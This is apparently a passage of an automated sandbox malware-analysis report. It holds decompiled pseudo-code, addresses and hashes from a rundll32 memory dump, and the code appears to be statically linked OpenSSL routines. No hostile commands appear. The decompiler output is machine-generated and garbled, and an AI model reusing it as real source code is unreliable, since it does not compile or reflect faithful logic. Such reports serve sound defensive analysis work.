				if (E0000021E21EF307E900( ~(_t20 >> 0x0000001f &  !( *_t296 & 0x000000ff) >> 0x0000001f), __ebx,  *((intOrPtr*)(_t267 + 0x40)), _t267 + 0x60, _t260, _t298, _t284, _t308) != 0) goto 0xf307f379;
				if (_t113 <= 0) goto 0xf307f12b;
				if (_t113 - 0x20 < 0) goto 0xf307f12b;
				_t219 = _t210 - 1;
				if (_t267 + 0x60 - _t219 + _t260 > 0) goto 0xf307f0c0;
				_t175 = _t267 + 0x60 + _t219 - _t260;
				if (_t175 >= 0) goto 0xf307f12b;
				if (_t175 >= 0) goto 0xf307f0d1;
				asm("o16 nop [eax+eax]");
				asm("movdqu xmm0, [eax]");
				asm("repe inc edx");
				asm("pxor xmm1, xmm0");
				asm("movdqu [eax], xmm1");
				asm("repe inc edx");
				asm("movdqu xmm0, [eax+0x10]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [eax+0x10], xmm1");
				if (_t255 + 0x20 - _t113 - ((_t113 & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 < 0) goto 0xf307f0f0;
				if (0x20 - _t210 >= 0) goto 0xf307f156;
				 *(_t267 + 0x80) =  *(_t267 + 0x80) ^  *(_t267 + 0x80 + _t260 - _t267 + 0x60) & 0x000000ff;
				if (0x21 - _t210 < 0) goto 0xf307f140;
				r9d = _t113;
				 *((long long*)(_t267 + 0x20)) =  *((intOrPtr*)(_t267 + 0x40));
				if (E0000021E21EF307E900(((_t113 & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1, r14d,  *((intOrPtr*)(_t267 + 0x40)), _t253, _t260 - _t267 + 0x60, _t267 + 0x60, _t113 - ((_t113 & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1, _t308) != 0) goto 0xf307f379;
				if (r14d <= 0) goto 0xf307f20a;
				if (r14d - 0x20 < 0) goto 0xf307f20a;
				_t226 = _t304 - 1;
				if (_t253 - _t226 + _t298 > 0) goto 0xf307f1a9;
				_t183 = _t226 + _t253 - _t298;
				if (_t183 >= 0) goto 0xf307f20a;
				if (_t183 >= 0) goto 0xf307f1bb;
				asm("movdqu xmm0, [ecx]");
				asm("repe inc ecx");
				asm("pxor xmm1, xmm0");
				asm("movdqu [ecx-0x20], xmm1");
				asm("repe inc ecx");
				asm("movdqu xmm0, [ecx-0x10]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [ecx-0x10], xmm1");
				if ( ~_t253 + _t253 + 0x20 - r14d - ((r14d & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 < 0) goto 0xf307f1d2;
				_t262 = r14d;
				_t185 = 0x20 - _t262;
				if (_t185 >= 0) goto 0xf307f241;
				asm("o16 nop [eax+eax]");
				 *(0x20 + _t253) =  *(0x20 + _t253) ^  *(0x20 + _t253 + _t298 - _t253) & 0x000000ff;
				if (_t185 != 0) goto 0xf307f230;
				_t206 =  *(_t267 + 0x48);
				r9d = 0;
				 *((long long*)(_t267 + 0x28)) = _t255;
				 *((long long*)(_t267 + 0x20)) = _t206;
				if (E0000021E21EF304E090(_t185, _t206, _t210,  *((intOrPtr*)(_t267 + 0x50)),  *((intOrPtr*)(_t267 + 0x160)), _t253, _t262, _t267 + 0xa0,  ~_t253) == 0) goto 0xf307f379;
				_t282 = _t210;
				_t247 = _t267 + 0xa0;
				_t92 = E0000021E21EF302A090(_t253, _t247, _t282, _t308);
				r11d =  *(_t267 + 0x3c);
				r9d = 0;
				_t53 = _t206 - 1; // -1
				r11d = r11d &  ~(_t53 >> 0x0000001f &  !_t92 >> 0x0000001f);
				_t187 = _t210 - _t262;
				if (_t187 >= 0) goto 0xf307f302;
				r8d =  *(_t253 + _t210) & 0x000000ff;
				r9d = r9d |  ~(_t206 - 0x00000001 >> 0x0000001f &  !(r8d ^ 0x00000001) >> 0x0000001f);
				r8d =  !r8d;
				r8d = r8d >> 0x1f;
				r11d = r11d & ( ~(_t282 - 0x00000001 >> 0x0000001f & r8d) | r9d);
				if (_t187 != 0) goto 0xf307f2b0;
				if ((r11d & r9d) == 0) goto 0xf307f339;
				_t60 = _t255 + 1; // 0x1
				r15d = r14d;
				r15d = r15d - _t60;
				if ( *((intOrPtr*)(_t267 + 0x38)) - r15d >= 0) goto 0xf307f366;
				 *((intOrPtr*)(_t267 + 0x20)) = 0xe3;
				_t63 = _t247 - 0x2c; // 0x6d
				r8d = _t63;
				E0000021E21EF30222D0(4, 0x99,  *((intOrPtr*)(_t267 + 0x38)) - r15d, _t206, _t210, _t253, _t247, _t255, _t262 - _t210 - 1, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c");
				 *((intOrPtr*)(_t267 + 0x20)) = 0xf0;
				_t66 = _t247 - 0x20; // 0x79
				r8d = _t66;
				_t108 = E0000021E21EF30222D0(4, 0x99,  *((intOrPtr*)(_t267 + 0x38)) - r15d, _t206, _t210, _t253, _t247, _t255, _t262 - _t210 - 1, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c");
				r15d = r15d | 0xffffffff;
				goto 0xf307f37e;
				E0000021E21EF310DC90(4, 0, 0 &  !( !r9d &  ~(_t206 - 0x00000001 >> 0x0000001f &  !(r8d ^ 0x00000001) >> 0x0000001f)) |  !r9d &  ~(_t206 - 0x00000001 >> 0x0000001f &  !(r8d ^ 0x00000001) >> 0x0000001f) & _t113, _t162,  *((intOrPtr*)(_t267 + 0x58)), _t108 + _t253, _t253, _t255, r15d);
				r8d = 0xf2;
				E0000021E21EF3025750();
				r8d = 0xf3;
				_t251 = "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c";
				E0000021E21EF3025750();
				goto 0xf307f3d4;
				 *((intOrPtr*)(_t267 + 0x20)) = 0xa0;
				_t70 = _t251 - 0x58; // 0x41
				r8d = _t70;
				_t111 = E0000021E21EF30222D0(4, 0x99,  *((intOrPtr*)(_t267 + 0x38)) - r15d, _t206, _t210,  *(_t267 + 0x30), "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c", _t255, _t262 - _t210 - 1, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c");
				goto 0xf307f379;
				E0000021E21EF310C290();
				return _t111 | 0xffffffff;
			}




































                                        0x21ef307ef10
                                        0x21ef307ef10
                                        0x21ef307ef10
                                        0x21ef307ef16
                                        0x21ef307ef1c
                                        0x21ef307ef25
                                        0x21ef307ef2a
                                        0x21ef307ef2d
                                        0x21ef307ef37
                                        0x21ef307ef51
                                        0x21ef307ef55
                                        0x21ef307ef60
                                        0x21ef307ef67
                                        0x21ef307ef6f
                                        0x21ef307ef75
                                        0x21ef307ef79
                                        0x21ef307ef7e
                                        0x21ef307ef86
                                        0x21ef307ef88
                                        0x21ef307ef8d
                                        0x21ef307ef98
                                        0x21ef307ef9c
                                        0x21ef307efa6
                                        0x21ef307efad
                                        0x21ef307efb6
                                        0x21ef307efbf
                                        0x21ef307efce
                                        0x21ef307efd4
                                        0x21ef307efde
                                        0x21ef307efe1
                                        0x21ef307efe7
                                        0x21ef307efed
                                        0x21ef307eff2
                                        0x21ef307f002
                                        0x21ef307f005
                                        0x21ef307f00a
                                        0x21ef307f012
                                        0x21ef307f01b
                                        0x21ef307f029
                                        0x21ef307f034
                                        0x21ef307f040
                                        0x21ef307f04a
                                        0x21ef307f052
                                        0x21ef307f055
                                        0x21ef307f05d
                                        0x21ef307f071
                                        0x21ef307f076
                                        0x21ef307f086
                                        0x21ef307f090
                                        0x21ef307f099
                                        0x21ef307f0a2
                                        0x21ef307f0b9
                                        0x21ef307f0bb
                                        0x21ef307f0be
                                        0x21ef307f0c8
                                        0x21ef307f0e6
                                        0x21ef307f0ff
                                        0x21ef307f103
                                        0x21ef307f109
                                        0x21ef307f10d
                                        0x21ef307f111
                                        0x21ef307f118
                                        0x21ef307f11d
                                        0x21ef307f121
                                        0x21ef307f129
                                        0x21ef307f131
                                        0x21ef307f14f
                                        0x21ef307f154
                                        0x21ef307f160
                                        0x21ef307f163
                                        0x21ef307f175
                                        0x21ef307f180
                                        0x21ef307f18a
                                        0x21ef307f194
                                        0x21ef307f1a2
                                        0x21ef307f1a4
                                        0x21ef307f1a7
                                        0x21ef307f1b2
                                        0x21ef307f1d2
                                        0x21ef307f1d9
                                        0x21ef307f1e7
                                        0x21ef307f1eb
                                        0x21ef307f1f0
                                        0x21ef307f1f7
                                        0x21ef307f1fc
                                        0x21ef307f200
                                        0x21ef307f208
                                        0x21ef307f20d
                                        0x21ef307f210
                                        0x21ef307f213
                                        0x21ef307f226
                                        0x21ef307f235
                                        0x21ef307f23f
                                        0x21ef307f241
                                        0x21ef307f256
                                        0x21ef307f25e
                                        0x21ef307f263
                                        0x21ef307f26f
                                        0x21ef307f275
                                        0x21ef307f278
                                        0x21ef307f283
                                        0x21ef307f288
                                        0x21ef307f28d
                                        0x21ef307f290
                                        0x21ef307f29f
                                        0x21ef307f2a2
                                        0x21ef307f2a5
                                        0x21ef307f2b0
                                        0x21ef307f2d4
                                        0x21ef307f2e8
                                        0x21ef307f2eb
                                        0x21ef307f2f9
                                        0x21ef307f300
                                        0x21ef307f305
                                        0x21ef307f307
                                        0x21ef307f30a
                                        0x21ef307f30d
                                        0x21ef307f315
                                        0x21ef307f31c
                                        0x21ef307f330
                                        0x21ef307f330
                                        0x21ef307f334
                                        0x21ef307f343
                                        0x21ef307f357
                                        0x21ef307f357
                                        0x21ef307f35b
                                        0x21ef307f360
                                        0x21ef307f364
                                        0x21ef307f374
                                        0x21ef307f37e
                                        0x21ef307f38e
                                        0x21ef307f393
                                        0x21ef307f399
                                        0x21ef307f3a3
                                        0x21ef307f3ab
                                        0x21ef307f3b2
                                        0x21ef307f3c6
                                        0x21ef307f3c6
                                        0x21ef307f3ca
                                        0x21ef307f3cf
                                        0x21ef307f3df
                                        0x21ef307f3fe

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\rsa\rsa_oaep.c
                                        • API String ID: 0-4203199248
                                        • Opcode ID: 19c273a6a853ded302c4e052d480de22dbbc3b184694ff403f6fa53c1001389a
                                        • Instruction ID: 8446b9d2e3a7d4b2a9d8a29e87b4e97409144ac2edd78c02b4a0aa6dc88ffb88
                                        • Opcode Fuzzy Hash: 19c273a6a853ded302c4e052d480de22dbbc3b184694ff403f6fa53c1001389a
                                        • Instruction Fuzzy Hash: 60D11872315A8585EF20DF29E8483EB67A1F7A9784F814226EE4A47F96DF3CC146C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF307D310 Relevance: 1.6, Strings: 1, Instructions: 311COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E0000021E21EF307D310(void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				intOrPtr _v16;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t34;

				_t24 = __rdx;
				_t20 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E0000021E21EF310C220();
				r12d = 0;
				_t5 = _t20 - 0x54; // -84
				r13d = r12d;
				if (E0000021E21EF3043BA0(_t5, __r8) == 0) goto 0xf307d38a;
				_t6 = _t34 + 0x75; // 0x75
				_v16 = 0x466;
				_t8 = _t24 - 0x72; // 0x3
				_t9 = _t34 + 0x42; // 0x42
				r8d = _t9;
				E0000021E21EF30222D0(_t8, _t6, E0000021E21EF3043BA0(_t5, __r8), __rax, __rdx, __r8, __rdx, __r8, __r9, "..\\..\\openssl-1.1.0f\\crypto\\bn\\bn_exp.c");
				return 0;
			}








                                        0x21ef307d310
                                        0x21ef307d310
                                        0x21ef307d310
                                        0x21ef307d315
                                        0x21ef307d31a
                                        0x21ef307d31f
                                        0x21ef307d331
                                        0x21ef307d33f
                                        0x21ef307d342
                                        0x21ef307d348
                                        0x21ef307d358
                                        0x21ef307d35a
                                        0x21ef307d35f
                                        0x21ef307d367
                                        0x21ef307d371
                                        0x21ef307d371
                                        0x21ef307d376
                                        0x21ef307d389

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\bn\bn_exp.c
                                        • API String ID: 0-1773629128
                                        • Opcode ID: 44cf608c8e9e0ea1f27ad89a929adb69eb242ecc0d45be217823984423d52145
                                        • Instruction ID: 5885d0a645bc0daa010d7a183fe39a26361e9006bc1e86a4e08874b9fbb0126e
                                        • Opcode Fuzzy Hash: 44cf608c8e9e0ea1f27ad89a929adb69eb242ecc0d45be217823984423d52145
                                        • Instruction Fuzzy Hash: B0A1EB7230028541FE60FA62AE097EBA2956BE0BC4F4681235E4C57F86EF3CC543D720
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3060A30 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 0c588d3321d01fc6d3c2f21d91274fff83078ffc8083afe41d4df569c79e9f7f
                                        • Instruction ID: 082a103f266b4c04ef7ec0eca11c3af12a362ecdfb27a8ce1239e85d6a8b2415
                                        • Opcode Fuzzy Hash: 0c588d3321d01fc6d3c2f21d91274fff83078ffc8083afe41d4df569c79e9f7f
                                        • Instruction Fuzzy Hash: F8711472215BC085EF148F25E8443AB6BA0F399B9CF159626DF9E03B99DA3CC592D304
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3114F38 Relevance: 1.4, Strings: 1, Instructions: 199COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0000021E21EF3114F38(void* __rax, long long __rbx, long long __rcx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t66;
				void* _t68;
				void* _t104;
				unsigned int _t105;
				intOrPtr _t106;
				unsigned int _t107;
				signed char _t114;
				void* _t119;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t162;
				void* _t174;
				void* _t176;
				intOrPtr* _t182;
				void* _t184;
				void* _t185;
				void* _t187;
				void* _t192;
				void* _t194;

				_t179 = __rsi;
				_t162 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t185 = _t184 - 0x30;
				_t66 =  *((char*)(__rcx + 0x41));
				r15d = 1;
				_t125 = _t66 - 0x64;
				if (_t125 > 0) goto 0xf3114fbf;
				if (_t125 == 0) goto 0xf3115030;
				if (_t66 == 0x41) goto 0xf3115043;
				if (_t66 == 0x43) goto 0xf3114fa9;
				if (_t66 - 0x44 <= 0) goto 0xf311504c;
				if (_t66 - 0x47 <= 0) goto 0xf3115043;
				if (_t66 == 0x53) goto 0xf3114fec;
				if (_t66 == 0x58) goto 0xf3115001;
				if (_t66 == 0x5a) goto 0xf3114fb5;
				if (_t66 == 0x61) goto 0xf3115043;
				if (_t66 != 0x63) goto 0xf311504c;
				E0000021E21EF3115CAC(_t66 - 0x63, __rcx, __rcx);
				goto 0xf3115048;
				_t68 = E0000021E21EF311574C(__rcx, __rcx, __rsi);
				goto 0xf3115048;
				if (_t68 - 0x67 <= 0) goto 0xf3115043;
				if (_t68 == 0x69) goto 0xf3115030;
				if (_t68 == 0x6e) goto 0xf3115029;
				if (_t68 == 0x6f) goto 0xf311500b;
				if (_t68 == 0x70) goto 0xf3114ff3;
				if (_t68 == 0x73) goto 0xf3114fec;
				if (_t68 == 0x75) goto 0xf3115034;
				if (_t68 != 0x78) goto 0xf311504c;
				goto 0xf3115039;
				E0000021E21EF3116084(__rcx, __rcx, _t179);
				goto 0xf3115048;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0xf311503c;
				_t105 =  *(__rcx + 0x30);
				if ((r15b & _t105 >> 0x00000005) == 0) goto 0xf311501f;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t105;
				goto 0xf3115039;
				E0000021E21EF3115FA8(_t105 >> 5, 8, __rcx, __rcx, _t174, _t179);
				goto 0xf3115048;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E0000021E21EF3115E08(_t104, 0xa, __rcx, _t187, _t192);
				goto 0xf3115048;
				if (E0000021E21EF311584C(_t119, _t162, __rcx, __rcx, _t179, __rbp, _t187) != 0) goto 0xf3115053;
				goto 0xf3115198;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0xf3115195;
				_t114 =  *(__rcx + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0xf31150a5;
				if ((r15b & 0) == 0) goto 0xf3115088;
				_a8 = 0x2d;
				goto 0xf31150a2;
				if ((r15b & _t114) == 0) goto 0xf3115094;
				_a8 = 0x2b;
				goto 0xf31150a2;
				if ((r15b & 0) == 0) goto 0xf31150a5;
				_a8 = 0x20;
				_t176 = _t194;
				_t106 =  *((intOrPtr*)(__rcx + 0x41));
				if (0 != 0) goto 0xf31150be;
				if ((r15b & 0) == 0) goto 0xf31150be;
				r8b = r15b;
				goto 0xf31150c1;
				r8b = 0;
				if (r8b != 0) goto 0xf31150d2;
				if (0 == 0) goto 0xf31150fc;
				 *((char*)(_t185 + _t176 + 0x50)) = 0x30;
				if (_t106 == 0x58) goto 0xf31150e8;
				if (_t106 == 0x41) goto 0xf31150e8;
				goto 0xf31150eb;
				asm("sbb al, al");
				 *((char*)(_t185 + _t176 + _t194 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t123 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t114 & 0x0000000c) != 0) goto 0xf311511e;
				r8d = _t123;
				E0000021E21EF31133C0(( ~r15b & 0x000000e0) + 0x78, 0x20, __rcx, __rcx + 0x468, __rcx + 0x28);
				_t182 = __rcx + 0x28;
				_v40 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E0000021E21EF31167F8(_t123, _t124, __rcx, __rcx + 0x468, _t176 + _t194 + _t194, _t179, _t182, _t182);
				_t107 =  *(__rcx + 0x30);
				if ((r15b & _t107 >> 0x00000003) == 0) goto 0xf311516a;
				if ((r15b & _t107 >> 0x00000002) != 0) goto 0xf311516a;
				r8d = _t123;
				E0000021E21EF31133C0(_t107 >> 3, 0x30, __rcx, __rcx + 0x468, _t182);
				E0000021E21EF3116340(__rcx, __rcx, _t179);
				if ( *_t182 < 0) goto 0xf3115195;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0xf3115195;
				r8d = _t123;
				E0000021E21EF31133C0( *(__rcx + 0x30) >> 2, 0x20, __rcx, __rcx + 0x468, _t182);
				return r15b;
			}

























                                        0x21ef3114f38
                                        0x21ef3114f38
                                        0x21ef3114f38
                                        0x21ef3114f3d
                                        0x21ef3114f42
                                        0x21ef3114f4c
                                        0x21ef3114f50
                                        0x21ef3114f57
                                        0x21ef3114f5d
                                        0x21ef3114f60
                                        0x21ef3114f62
                                        0x21ef3114f6b
                                        0x21ef3114f74
                                        0x21ef3114f79
                                        0x21ef3114f82
                                        0x21ef3114f8b
                                        0x21ef3114f90
                                        0x21ef3114f95
                                        0x21ef3114f9a
                                        0x21ef3114fa3
                                        0x21ef3114fab
                                        0x21ef3114fb0
                                        0x21ef3114fb5
                                        0x21ef3114fba
                                        0x21ef3114fc2
                                        0x21ef3114fc7
                                        0x21ef3114fcc
                                        0x21ef3114fd1
                                        0x21ef3114fd6
                                        0x21ef3114fdb
                                        0x21ef3114fe0
                                        0x21ef3114fe5
                                        0x21ef3114fea
                                        0x21ef3114fec
                                        0x21ef3114ff1
                                        0x21ef3114ff3
                                        0x21ef3114ffa
                                        0x21ef3115001
                                        0x21ef3115009
                                        0x21ef311500b
                                        0x21ef3115016
                                        0x21ef3115018
                                        0x21ef311501c
                                        0x21ef3115027
                                        0x21ef3115029
                                        0x21ef311502e
                                        0x21ef3115030
                                        0x21ef3115039
                                        0x21ef311503c
                                        0x21ef3115041
                                        0x21ef311504a
                                        0x21ef311504e
                                        0x21ef3115057
                                        0x21ef311505d
                                        0x21ef3115062
                                        0x21ef3115069
                                        0x21ef3115075
                                        0x21ef311507f
                                        0x21ef3115081
                                        0x21ef3115086
                                        0x21ef311508b
                                        0x21ef311508d
                                        0x21ef3115092
                                        0x21ef311509b
                                        0x21ef311509d
                                        0x21ef31150a2
                                        0x21ef31150a5
                                        0x21ef31150ad
                                        0x21ef31150b7
                                        0x21ef31150b9
                                        0x21ef31150bc
                                        0x21ef31150be
                                        0x21ef31150cc
                                        0x21ef31150d0
                                        0x21ef31150d2
                                        0x21ef31150dd
                                        0x21ef31150e2
                                        0x21ef31150e6
                                        0x21ef31150ed
                                        0x21ef31150f5
                                        0x21ef3115102
                                        0x21ef3115107
                                        0x21ef311510d
                                        0x21ef3115119
                                        0x21ef3115122
                                        0x21ef311512d
                                        0x21ef311513d
                                        0x21ef3115140
                                        0x21ef3115145
                                        0x21ef3115150
                                        0x21ef3115158
                                        0x21ef311515d
                                        0x21ef3115165
                                        0x21ef311516f
                                        0x21ef3115178
                                        0x21ef3115183
                                        0x21ef3115188
                                        0x21ef3115190
                                        0x21ef31151b0

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: 0
                                        • API String ID: 3215553584-4108050209
                                        • Opcode ID: 1e8cdb325f8c5063b2eceb296698c12dc0071de2deb1ad2c62c982258cd230f5
                                        • Instruction ID: 63e1f4ba1c058a296b8ae7f86da60987db2c088cb04265de97c9d4a40710831d
                                        • Opcode Fuzzy Hash: 1e8cdb325f8c5063b2eceb296698c12dc0071de2deb1ad2c62c982258cd230f5
                                        • Instruction Fuzzy Hash: 4271F73121428046FFA8AA69884C3EF67F9A761B44F161915DD418BFABCB2ECD47C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30528D0 Relevance: 1.4, Strings: 1, Instructions: 185COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E0000021E21EF30528D0(long long __rbx, unsigned int __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __rbp, unsigned int __r9, signed int __r10, long long _a8, long long _a16, long long _a24, long long _a32) {
				signed int _t44;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t55;
				unsigned int _t62;
				signed int _t65;
				signed int _t78;
				signed int _t89;
				signed int _t94;
				signed int _t99;
				void* _t175;
				unsigned long long _t180;
				signed long long _t181;
				signed long long _t185;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				_t175 = __rcx + 1;
				r9d =  *(_t175 + 3) & 0x000000ff;
				_t44 =  *__rcx & 0x000000ff | ( *(__rcx + 1) & 0x000000ff) << 0x00000008 | ( *(_t175 + 1) & 0x000000ff) << 0x00000010 | ( *(_t175 + 2) & 0x000000ff) << 0x00000018;
				r9d = r9d | ( *(_t175 + 4) & 0x000000ff) << 0x00000008;
				r9d = r9d | (( *(_t175 + 6) & 0x000000ff) << 0x00000008 |  *(_t175 + 5) & 0x000000ff) << 0x00000010;
				_t78 = (r9d >> 0x00000004 ^ _t44) & 0x0f0f0f0f;
				_t45 = _t44 ^ _t78;
				r9d = r9d ^ _t78 << 0x00000004;
				_t46 = _t44 ^ _t78 ^ ((_t45 << 0x00000012 ^ _t45) & 0xcccc0000) >> 0x00000012 ^ (_t45 << 0x00000012 ^ _t45) & 0xcccc0000;
				r9d = r9d ^ ((r9d << 0x00000012 ^ r9d) & 0xcccc0000) >> 0x00000012 ^ (r9d << 0x00000012 ^ r9d) & 0xcccc0000;
				_t89 = (r9d >> 0x00000001 ^ _t46) & 0x55555555;
				_t47 = _t46 ^ _t89;
				r9d = r9d ^ _t89 + _t89;
				_t94 = (_t47 >> 0x00000008 ^ r9d) & 0x00ff00ff;
				r9d = r9d ^ _t94;
				_t48 = _t47 ^ _t94 << 0x00000008;
				_t99 = (r9d >> 0x00000001 ^ _t48) & 0x55555555;
				r9d = r9d ^ _t99 + _t99;
				r9d = r9d & 0x0000ff00;
				_t62 = (r9d >> 0x0000000c & 0x00000ff0 | (_t48 ^ _t99) & 0xf000000f) >> 0x00000004 | (r9b & 0xffffffff) << 0x00000010 | r9d;
				if ( *0xf316ca40 == 0) goto 0xf3052a1f;
				goto 0xf3052a31;
				_t55 = (_t62 << 0x0000001a << 0x0000001b | _t62 >> 0x00000002 >> 0x00000001) & 0x0fffffff;
				r10d = _t55;
				_t65 = (_t62 << 0x0000001b | _t62 >> 0x00000001) & 0x0fffffff;
				r9d = _t55;
				_t185 = __r9 >> 1;
				r10d = r10d & 0x0000003f;
				r8d = r8d & 0x07000000;
				r9d = r9d & 0x00060000;
				_t180 = ((_t185 | __rcx) >> 0x00000001 | __rcx) >> 0x14;
				r11d =  *(0xf316c240 + 0x300 + _t180 * 4);
				r11d = r11d |  *(0xf316c240 + 0x100 + ((_t185 | __rcx) >> 6) * 4);
				r8d = _t65;
				_t181 = _t180 >> 1;
				r11d = r11d |  *(0xf316c240 + 0x200 + ((_t185 | __rcx) >> 0xd) * 4);
				r11d = r11d |  *(0xf316c240 + __r10 * 4);
				r10d = _t65;
				r8d = r8d & 0x00001e00;
				r10d = r10d & 0x0000003f;
				r9d =  *(0xf316c240 + 0x700 + ((_t181 | __rcx) >> 0x15) * 4);
				r11d = r11d >> 0x10;
				r9d = r9d |  *(0xf316c240 + 0x500 + ((_t181 | __rcx) >> 7) * 4);
				r9d = r9d |  *(0xf316c240 + 0x600 + (__rcx >> 0xf) * 4);
				r9d = r9d |  *(0xf316c240 + 0x400 + __r10 * 4);
				r9d = r9d & 0xffff0000;
				r11d = r11d | r9d;
				asm("inc ecx");
				asm("ror edx, 0x1e");
				 *__rdx = r11w & 0xffffffff | r9d << 0x00000010;
				__rdx[1] = r11d;
				if (0x21ef316ca44 - "..\\..\\openssl-1.1.0f\\crypto\\evp\\evp_enc.c" < 0) goto 0xf3052a00;
				return _t55;
			}


















                                        0x21ef30528d0
                                        0x21ef30528d5
                                        0x21ef30528da
                                        0x21ef30528df
                                        0x21ef30528e9
                                        0x21ef3052904
                                        0x21ef3052923
                                        0x21ef3052930
                                        0x21ef305293d
                                        0x21ef3052948
                                        0x21ef305294e
                                        0x21ef3052953
                                        0x21ef305296d
                                        0x21ef3052982
                                        0x21ef305298c
                                        0x21ef3052992
                                        0x21ef3052996
                                        0x21ef30529a1
                                        0x21ef30529a7
                                        0x21ef30529ad
                                        0x21ef30529b6
                                        0x21ef30529c0
                                        0x21ef30529e0
                                        0x21ef30529ec
                                        0x21ef3052a07
                                        0x21ef3052a1d
                                        0x21ef3052a33
                                        0x21ef3052a3a
                                        0x21ef3052a3d
                                        0x21ef3052a4b
                                        0x21ef3052a4e
                                        0x21ef3052a51
                                        0x21ef3052a5b
                                        0x21ef3052a6b
                                        0x21ef3052a8c
                                        0x21ef3052aa4
                                        0x21ef3052ab6
                                        0x21ef3052abe
                                        0x21ef3052ac1
                                        0x21ef3052ac4
                                        0x21ef3052acf
                                        0x21ef3052add
                                        0x21ef3052ae4
                                        0x21ef3052aed
                                        0x21ef3052afc
                                        0x21ef3052b0f
                                        0x21ef3052b17
                                        0x21ef3052b1f
                                        0x21ef3052b27
                                        0x21ef3052b32
                                        0x21ef3052b3c
                                        0x21ef3052b41
                                        0x21ef3052b45
                                        0x21ef3052b48
                                        0x21ef3052b4a
                                        0x21ef3052b55
                                        0x21ef3052b71

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\evp\evp_enc.c
                                        • API String ID: 0-3265282262
                                        • Opcode ID: 6115c68850099d0d5c228b3fa95897ba6e4563580928cf819ccc0873f49add84
                                        • Instruction ID: f574565a0ac4d39616d6db62804fec6af2a7bd370d939907adf03f2a1846f36c
                                        • Opcode Fuzzy Hash: 6115c68850099d0d5c228b3fa95897ba6e4563580928cf819ccc0873f49add84
